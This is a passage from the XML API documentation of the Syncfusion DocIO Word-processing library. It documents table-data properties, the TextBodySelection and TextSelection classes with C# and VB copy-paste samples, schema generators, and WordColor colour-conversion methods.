            Gets header footer character position table.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.CHPXBinaryTable">
            <summary>
            Gets chpx BinaryTable
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.PAPXBinaryTable">
            <summary>
            Gets papx BinaryTable
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.HeaderPositions">
            <summary>
            Gets/sets header positions
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.SectionCount">
            <summary>
            Gets number of sections
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.BookmarkStrings">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.BookmarkDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.DOP">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.ListInfo">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.PieceTablePositions">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.FileArtObjects">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Escher">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Fields">
            <summary>
            Get/set fields property
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.MacroCommands">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Fib">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StandardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StandardFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StandardNonFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StandardBidiFont">
            <summary>
            Gets and sets the standard/default bidi font
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.GrammarSpellingData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Variables">
            <summary>
            Gets or sets the byte array of document variables.
            </summary>
            <value>The variables.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.AsociatedStrings">
            <summary>
            Gets or sets the asociated strings.
            </summary>
            <value>The asociated strings.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.SttbfRMark">
            <summary>
            Gets or sets the STTBF r mark.
            </summary>
            <value>
            The STTBF r mark.
            </value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextBodySelection">
            <summary>
            Represents a selection of part of text body in the Word document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodySelection.#ctor(Syncfusion.DocIO.DLS.ParagraphItem,Syncfusion.DocIO.DLS.ParagraphItem)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/> class with 
            start paragraph item and end paragraph item.
            </summary>
            <param name="itemStart">The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> that specifies the start of the selection.</param>
            <param name="itemEnd">The <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> that specifies the end of the selection.</param>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the template document
                WordDocument document = new WordDocument("Bookmarks.docx", FormatType.Docx);
                //Get the text body of first section
                WTextBody textbody = document.Sections[0].Body;
                //Gets the second paragraph 
                WParagraph paragraph = textbody.Paragraphs[1];
                //Get the start and end items
                ParagraphItem startItem = (ParagraphItem)paragraph.ChildEntities[0];
                ParagraphItem endItem = (ParagraphItem)paragraph.ChildEntities[1];
                //Selects the items in the text body
                TextBodySelection selection = new TextBodySelection(startItem, endItem);
                //Create new text body part
                TextBodyPart textbodyPart = new TextBodyPart(document);
                //Copy the selected items
                textbodyPart.Copy(selection);
                //Paste the selected items.
                textbodyPart.PasteAt(textbody, 2);
                //Save and close the document.
                document.Save("Result.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the template document
                Dim document As New WordDocument("Bookmarks.docx", FormatType.Docx)
                'Get the text body of first section
                Dim textbody As WTextBody = document.Sections(0).Body
                'Gets the second paragraph 
                Dim paragraph As WParagraph = textbody.Paragraphs(1)
                'Get the start and end items
                Dim startItem As ParagraphItem = DirectCast(paragraph.ChildEntities(0), ParagraphItem)
                Dim endItem As ParagraphItem = DirectCast(paragraph.ChildEntities(1), ParagraphItem)
                'Selects the items in the text body
                Dim selection As New TextBodySelection(startItem, endItem)
                'Create new text body part
                Dim textbodyPart As New TextBodyPart(document)
                'Copy the selected items
                textbodyPart.Copy(selection)
                'Paste the selected items.
                textbodyPart.PasteAt(textbody, 2)
                'Save and close the document.
                document.Save("Result.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodySelection.#ctor(Syncfusion.DocIO.DLS.ITextBody,System.Int32,System.Int32,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextBodySelection"/> class with the textbody, 
            start paragraph index, end paragraph index, start paragraph item index, and end paragraph item index.
            </summary>
            <param name="textBody">The <see cref="T:Syncfusion.DocIO.DLS.ITextBody"/> instance.</param>
            <param name="itemStartIndex">The <b>integer</b> specifying paragraph starting index.</param>
            <param name="itemEndIndex">The <b>integer</b> specifying paragraph ending index.</param>
            <param name="pItemStartIndex">The <b>integer</b> specifying paragraph item starting index in first paragraph.</param>
            <param name="pItemEndIndex">The <b>integer</b> specifying paragraph item ending index in last paragraph.</param>
            <example>
            <code language="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Open the template document
                WordDocument document = new WordDocument("Template.docx", FormatType.Docx);
                //Get the text body of first section
                WTextBody textbody = document.Sections[0].Body;
                //Selects the items in the text body
                TextBodySelection selection = new TextBodySelection(textbody, 0, 1, 0, 1);
                //Create new text body part
                TextBodyPart textbodyPart = new TextBodyPart(document);
                //Copy the selected items
                textbodyPart.Copy(selection);
                //Paste the selected items.
                textbodyPart.PasteAt(textbody, 2);
                //Save and close the document.
                document.Save("Sample.docx");
                document.Close();
            }
            </code>
            <code language="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Open the template document
                Dim document As New WordDocument("Template.docx", FormatType.Docx)
                    'Get the text body of first section
                Dim textbody As WTextBody = document.Sections(0).Body
                'Selects the items in the text body
                Dim selection As New TextBodySelection(textbody, 0, 1, 0, 1)
                'Create new text body part
                Dim textbodyPart As New TextBodyPart(document)
                'Copy the selected items
                textbodyPart.Copy(selection)
                'Paste the selected items.
                textbodyPart.PasteAt(textbody, 2)
                'Save and close the document.
                document.Save("Sample.docx")
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextBodySelection.ValidateIndexes">
            <summary>
            Validates the indexes.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodySelection.TextBody">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> of the selection part. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WTextBody"/> instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodySelection.ItemStartIndex">
            <summary>
            Gets or sets the start index of the text body item.
            </summary>
            <value>The zero-based index of the item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodySelection.ItemEndIndex">
            <summary>
            Gets or sets the end index of the text body item.
            </summary>
            <value>The zero-based index of the item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodySelection.ParagraphItemStartIndex">
            <summary>
            Gets or sets the start index of the paragraph item.
            </summary>
            <value>The zero-based index of the item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextBodySelection.ParagraphItemEndIndex">
            <summary>
            Gets or sets the end index of the paragraph item.
            </summary>
            <value>The zero-based index of the item.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.TextSelection">
            <summary>
            Represent a selection of text inside paragraph.
            </summary>
            <remarks>
            <para>The following are the limitations in using the <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> class:
            <list type="bullet">
            <item>Text selection must be continuous (must not be split).</item>
            <item>The selected text should remain within a single paragraph, and will be ignored if it extends to more than one paragraph.</item>
            </list>
            </para>
            </remarks>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.TextSelection.SelectionChain">
            <summary>
            Gets the selection chain.
            </summary>
            <value>The selection chain.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.#ctor(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Int32)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.TextSelection"/> class.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="startCharPos">The start char position.</param>
            <param name="endCharPos">The end char position.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.GetRanges">
            <summary>
            Gets the ranges.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.GetAsOneRange">
            <summary>
            Gets as one range.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.SplitAndErase">
            <summary>
            Splits and erase the content of selection.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.CacheRanges">
            <summary>
            Caches the ranges.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.CopyTo(Syncfusion.DocIO.DLS.WParagraph,System.Int32,System.Boolean,Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Copies ranges to specified paragraph.
            </summary>
            <param name="para">The paragraph.</param>
            <param name="startIndex">The start index.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.GetEnumerator">
            <summary>
            Returns an enumerator that iterates through a collection.
            </summary>
            <returns>
            An <see cref="T:System.Collections.IEnumerator"></see> object that can be used to iterate through the collection.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.EnsureIndexes">
            <summary>
            Ensures the indexes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.SplitRanges">
            <summary>
            Splits the ranges.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.TextSelection.UpdateFollowingSelections(System.Boolean)">
            <summary>
            Updates the following selections.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.SelectedText">
            <summary>
            Gets the selected text. Read-only.
            </summary>
            <value>The <b>string</b> that represents the selected text.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.Item(System.Int32)">
            <summary>
            Gets or sets the string at the specified index from the 
            <see cref="T:Syncfusion.DocIO.DLS.WTextRange"/> collection. 
            </summary>
            <param name="index">The zero-based index of the string to get.</param>
            <value>The <b>string</b> at the specified collection.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.Count">
            <summary>
            Gets the number of text chunks in the <see cref="T:Syncfusion.DocIO.DLS.WTextRange"/> collection. Read-only.
            </summary>
            <value>The count.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.OwnerParagraph">
            <summary>
            Gets the paragraph owner.
            </summary>
            <value>The paragraph owner.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.StartTextRange">
            <summary>
            Gets the start text range.
            </summary>
            <value>The start text range.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.TextSelection.EndTextRange">
            <summary>
            Gets the end text range.
            </summary>
            <value>The end text range.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DocIOXsdGenerator">
            <summary>
            Summary description for DocIOXsdGenerator.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XsdGenerator">
            <summary>
            Summary description for XSDSchemeGenerator.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XsdGenerator.DEF_DLS_RESOURCES">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XsdGenerator.DEF_SCHEME_NS">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.GetDLSLocalSchema">
            <summary>
            Gets the DLS local schema.
            </summary>
            <returns>Returns the DLS local schema.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.GenerateDLSSchema">
            <summary>
            Generates the DLS schema.
            </summary>
            <returns>Returns the DLS schema.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.GenerateSchema(System.Xml.XmlDocument)">
            <summary>
            Generates the schema.
            </summary>
            <param name="metaSchema">The meta schema.</param>
            <returns>Returns the XmlSchema.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.GetResourceStream(System.String,System.String)">
            <summary>
            Gets the resource stream.
            <exclude/>
            </summary>
            <param name="resName">Name of the res.</param>
            <param name="resNamespace">The res namespace.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.GetDLSResourceStream(System.String)">
            <summary>
            Gets the DLS resource stream.
            <exclude/>
            </summary>
            <param name="resName">Name of the res.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.LoadXmlDocument(System.IO.Stream)">
            <summary>
            Loads the XML document.
            <exclude/>
            </summary>
            <param name="stream">The stream.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.OnValidation(System.Object,System.Xml.Schema.ValidationEventArgs)">
            <summary>
            Called when [validation].
            <exclude/>
            </summary>
            <param name="sender">The sender.</param>
            <param name="args">The <see cref="T:System.Xml.Schema.ValidationEventArgs"/> instance containing the event data.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseType(System.Xml.XmlNode)">
            <summary>
            Parses the type.
            </summary>
            <param name="typeNode">The type node.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseSimpleType(System.Xml.XmlNode,Syncfusion.DocIO.DLS.ModeType)">
            <summary>
            Parses the type of the simple.
            </summary>
            <param name="typeNode">The type node.</param>
            <param name="mode">The mode.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseComplexType(System.Xml.Schema.XmlSchemaGroupBase,System.Xml.XmlNode,System.Boolean)">
            <summary>
            Parses the type of the complex.
            </summary>
            <param name="group">The group.</param>
            <param name="typeNode">The type node.</param>
            <param name="isGrouping">if set to <c>true</c> [is grouping].</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseElement(System.Xml.XmlNode,System.Xml.Schema.XmlSchemaGroupBase)">
            <summary>
            Parses the element.
            </summary>
            <param name="elementNode">The element node.</param>
            <param name="group">The group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseGroup(System.Xml.XmlNode,System.Xml.Schema.XmlSchemaGroupBase)">
            <summary>
            Parses the group.
            </summary>
            <param name="groupNode">The group node.</param>
            <param name="group">The group.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.ParseAttribute(System.Xml.XmlNode,System.Xml.Schema.XmlSchemaObjectCollection)">
            <summary>
            Parses the attribute.
            </summary>
            <param name="attrNode">The attr node.</param>
            <param name="attributes">The attributes.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.MergeWithInclude(System.Xml.XmlDocument,System.Xml.XmlDocument)">
            <summary>
            Merges the with include.
            </summary>
            <param name="metaSchema">The meta schema.</param>
            <param name="includeSchema">The include schema.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XsdGenerator.MergeWithInclude(System.Xml.XmlDocument,System.Xml.XmlDocument,System.String)">
            <summary>
            Merges the with include.
            </summary>
            <param name="includeSchema">The include schema.</param>
            <param name="metaSchema">The meta schema.</param>
            <param name="tagsName">Name of the tags.</param>
        </member>
        <member name="F:Syncfusion.DocIO.DocIOXsdGenerator.DEF_DOCIO_RESOURCES">
            <summary>
            constant string value.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DocIOXsdGenerator.GetDocIOLocalSchema">
            <summary>
            Returns Schema of DocIO.
            </summary>
            <returns>Returns the Schema in XML format.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DocIOXsdGenerator.GenerateDocIOSchema">
            <summary>
            Generates Schema for DocIO.
            </summary>
            <returns>Returns the Schema in XML format.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DocIOXsdGenerator.GetDocIOResourceStream(System.String)">
            <summary>
            Gets the doc IO resource stream.
            <exclude/>
            </summary>
            <param name="resName">Name of the res.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DocIOXsdGenerator.GetResourceStream(System.String,System.String)">
            <summary>
            Returns Stream for a specified resource.
            <exclude/>
            </summary>
            <param name="resName">Specifies resource Name.</param>
            <param name="resNamespace">Specified Resource NameSpace.</param>
            <returns></returns>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WordColor">
            <summary>
            The class WordColor implements routines working with Color.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordColor.WordKnownColors">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordColor.ArgbArray">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordColor.ColorsArray">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordColor.m_color">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WordColor.m_colorId">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.#ctor(System.Byte)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WordColor"/> class with known color index.
            </summary>
            <param name="index">The byte index represents the index of the known color.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertHSLToRGB(System.Double,System.Double,System.Double)">
            <summary>
            Converts the HSL to RGB.
            </summary>
            <param name="hue">The hue.</param>
            <param name="saturation">The saturation.</param>
            <param name="luminance">The luminance.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColorByShade(System.Drawing.Color,System.Double)">
            <summary>
            Converts the color by shade.
            </summary>
            <param name="color">The color.</param>
            <param name="shade">The shade.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ApplyShade(System.Double,System.Double)">
            <summary>
            Shades the specified color value.
            </summary>
            <param name="colorValue">The color value.</param>
            <param name="shade">The shade.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColorByTint(System.Drawing.Color,System.Double)">
            <summary>
            Converts the color by tint.
            </summary>
            <param name="color">The color.</param>
            <param name="tint">The tint.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ApplyTint(System.Double,System.Double)">
            <summary>
            Applies tint to the specified color value.
            </summary>
            <param name="colorValue">The color value.</param>
            <param name="tint">The tint.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyModulation(System.Byte,System.Double)">
            <summary>
            Converts based on modulation.
            </summary>
            <param name="value">The value.</param>
            <param name="percent">The percent.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyOffset(System.Byte,System.Double)">
            <summary>
            Converts based on offset.
            </summary>
            <param name="value">The value.</param>
            <param name="percent">The percent.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyHue(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on hue.
            </summary>
            <param name="color">The color.</param>
            <param name="angle">The angle.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyHueMod(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on hue mod.
            </summary>
            <param name="color">The color.</param>
            <param name="ratio">The ratio.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyHueOffset(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on hue offset.
            </summary>
            <param name="color">The color.</param>
            <param name="angle">The angle.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyLum(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on lum.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyLumMod(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on lum mod.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbyLumOffset(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on lum offset.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbySat(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on sat.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbySatMod(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on sat mod.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertbySatOffset(System.Drawing.Color@,System.Double)">
            <summary>
            Converts based on sat offset.
            </summary>
            <param name="color">The color.</param>
            <param name="percent">The percent.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ComplementColor(System.Drawing.Color)">
            <summary>
            Complements the color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.InverseGammaColor(System.Drawing.Color)">
            <summary>
            Inverses the color of the gamma.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertsRGBtoLinearRGB(System.Double)">
            <summary>
            Converts the RGB to linear RGB.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.GammaColor(System.Drawing.Color)">
            <summary>
            Gammas the color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertsLinearRGBtoRGB(System.Double)">
            <summary>
            Converts the linear RGB to RGB.
            </summary>
            <param name="value">The value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.GrayColor(System.Drawing.Color)">
            <summary>
            Grays the color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.InverseColor(System.Drawing.Color)">
            <summary>
            Inverses the color.
            </summary>
            <param name="color">The color.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ApplyInverse(System.Double)">
            <summary>
            Inverses the specified color value.
            </summary>
            <param name="colorValue">The color value.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColortoHSL(System.Drawing.Color,System.Double@,System.Double@,System.Double@)">
            <summary>
            Converts the colorto HSL.
            </summary>
            <param name="color">The color.</param>
            <param name="hue">The hue.</param>
            <param name="saturation">The saturation.</param>
            <param name="luminance">The luminance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertHSLToColor(System.Double,System.Double,System.Double)">
            <summary>
            Converts the color of the HSL to.
            </summary>
            <param name="hue">The hue.</param>
            <param name="saturation">The saturation.</param>
            <param name="luminance">The luminance.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.HueToRGB(System.Double,System.Double,System.Double)">
            <summary>
            Hues to RGB.
            </summary>
            <param name="n1">The n1.</param>
            <param name="n2">The n2.</param>
            <param name="hue">The hue.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.IdToColor(System.Int32)">
            <summary>
            Returns the Color value for the specified color ID.
            </summary>
            <param name="wordColorId">Specifies color ID.</param>
            <returns>Returns the Color value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ColorToId(System.Drawing.Color)">
            <summary>
            Converts the Color value as an integer value.
            </summary>
            <param name="color">Specifies Color value.</param>
            <returns>Returns the corresponding ID value of the color.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColorToRGB(System.Drawing.Color)">
            <summary>
            Converts the color to RGB.
            </summary>
            <param name="color">Specifies the Color value.</param>
            <returns>Returns the converted RGB value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColorToRGB(System.Drawing.Color,System.Boolean)">
            <summary>
            Converts the color to RGB.
            </summary>
            <param name="color">The color.</param>
            <param name="ignoreAlpha">If set to <c>true</c> ignores alpha channel.</param>
            <returns>Returns the converted RGB value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertIdToRGB(System.Int32)">
            <summary>
            Converts the specified ID value as RGB value.
            </summary>
            <param name="colorId">Color identification value.</param>
            <returns>Returns RGB value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertRGBToId(System.UInt32)">
            <summary>
             Converts RGB value as int value.
            </summary>
            <param name="rgb">Specifies RGB value.</param>
            <returns>Returns the ID value for a specified RGB.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertRGBToColor(System.UInt32)">
            <summary>
            Converts the RGB as Color value.
            </summary>
            <param name="rgb">RGB Value.</param>
            <returns>Returns Color value.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertColorToId(System.Drawing.Color)">
            <summary>
            Converts the Color as a color ID.
            </summary>
            <param name="color">Specifies Color value.</param>
            <returns>Returns color ID.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ConvertIdToColor(System.Int32)">
            <summary>
            Gets the Color value for a specified ID.
            </summary>
            <param name="id">Specifies Color ID value.</param>
            <returns>Returns Color value/.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.ReduceColor(System.Drawing.Color)">
            <summary>
            
            </summary>
            <param name="color"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.FindSimilarColor(System.UInt32,System.UInt32)">
            <summary>
            
            </summary>
            <param name="wordColor"></param>
            <param name="rgbColor"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.IsVeryDarkColor(System.Int32,System.Int32,System.Int32)">
            <summary>
            Gets a value indicating whether the specified background color is very dark. 
            So that text with color automatic in this background will be displayed as white by Microsoft Word.
            </summary>
            <param name="r">The red component value of the background color</param>
            <param name="g">The green component value of the background color</param>
            <param name="b">The blue component value of the background color</param>
            <returns>True if the specified background color is very dark; false otherwise.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WordColor.IsNotVeryDarkColor(System.Drawing.Color)">
            <summary>
            Gets a value indicating whether the specified background color is not very dark. 
            So that text with color automatic in this background will be displayed as black by Microsoft Word.
            </summary>
            <param name="backColor">The background color of the text</param>
            <returns>True if the specified background color is not very dark; false otherwise.</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Empty">
            <summary>
            Gets the a null color.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Black">
            <summary>
             Gets Black color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Blue">
            <summary>
            Gets Blue color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Cyan">
            <summary>
             Gets Cyan color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Green">
            <summary>
             Gets Green color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Magenta">
            <summary>
             Gets Magenta color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Red">
            <summary>
            Gets Red color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.Yellow">
            <summary>
            Gets Yellow color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.White">
            <summary>
            Gets White color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkBlue">
            <summary>
            Gets DarkBlue color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkCyan">
            <summary>
            Gets DarkCyan color. Read-only.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WordColor.DarkGreen">
            <summary>
